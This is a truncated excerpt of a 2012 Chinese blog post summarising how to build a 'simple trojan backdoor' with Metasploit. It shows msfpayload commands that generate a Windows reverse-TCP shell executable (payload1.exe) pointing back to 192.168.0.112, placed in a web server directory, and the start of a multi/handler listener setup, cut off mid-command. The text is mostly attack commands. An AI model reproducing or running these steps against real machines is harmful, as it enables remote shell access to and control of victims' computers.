摘要: 1.生成简单到木马后门root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp O //查看这个payload有什么选项root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.112 X > /var/www/payload1.exe另一个终端监听msf > use exploit/multi/handlermsf exploit(handler) > set payload wind 阅读全文
posted @ 2012-12-01 14:17 山貓 阅读(2784) 评论(0) 推荐(0) 编辑